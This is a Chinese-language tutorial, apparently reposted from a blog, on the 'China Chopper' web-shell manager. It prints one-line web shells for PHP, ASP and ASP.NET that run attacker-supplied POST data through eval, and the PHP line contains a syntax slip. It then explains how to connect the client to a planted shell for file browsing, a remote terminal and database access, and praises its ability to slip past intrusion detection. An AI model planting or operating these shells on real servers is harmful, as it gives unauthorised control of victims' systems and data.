其他分享
首页 > 其他分享> > 中国菜刀以及一句话木马的使用

中国菜刀以及一句话木马的使用

作者:互联网

一、简介
服务器只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP、ASP、.NET,并且支持、https安全连接的网站
在服务器端运行的代码如下:
PHP:<?php @eval($_POST['pass'];?)>
ASP:<%eval request("pass")%>
ASP.NET:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

二、用法
在主视图中右键添加,在弹出的对话框中输入服务器地址,连接的密码(注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大板块功能,同时支持自定义的脚本执行,并可以导入导出数据。
1.文件管理:缓存下载目录,并支持离线查看缓存目录
2.虚拟终端:人性化设计,操作方便
3.数据库管理:图形界面,支持mysql/mssql/orcle/infomix/access以及支持ADO方式连接的数据库。(各种脚本条件下的数据库连接方式请点击数据库管理界面左上角处的配置按钮进行查看)

三、配置信息填写
1. 数据库方面
PHP脚本:
类型 类型可以为MySQL、MSSQL、ORCLE、INFOMIX中的一种
主机地址 主机地址可以为机器名或IP地址,如localhost
数据库用户 连接数据库的用户名

数据库密码

连接数据库的密码 示例: ![在这里插入图片描述](https://www.icode9.com/i/ll/?i=2019120417522536.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzM3Nzg2MDE0,size_16,color_FFFFFF,t_70)

ASP和ASP.NET脚本:
类型 类型只能填ADO
ADO配置信息
ADO连接各种数据库的方式不一样,如MSSQL的配置信息为:
Driver={Sql Sever}; Server=(local); Database=master;Uid=sa;Pwd=123456;同时,支持NT验证登录MSSQL数据库,并把哈希的结果列表导出为html文件

Customize脚本:
类型 类型只能填XDB
与Customize脚本约定的配置信息

标签:脚本,ASP,木马,一句,数据库,菜刀,类型,ADO,连接
来源: https://www.cnblogs.com/xiaoyubaijian/p/14357056.html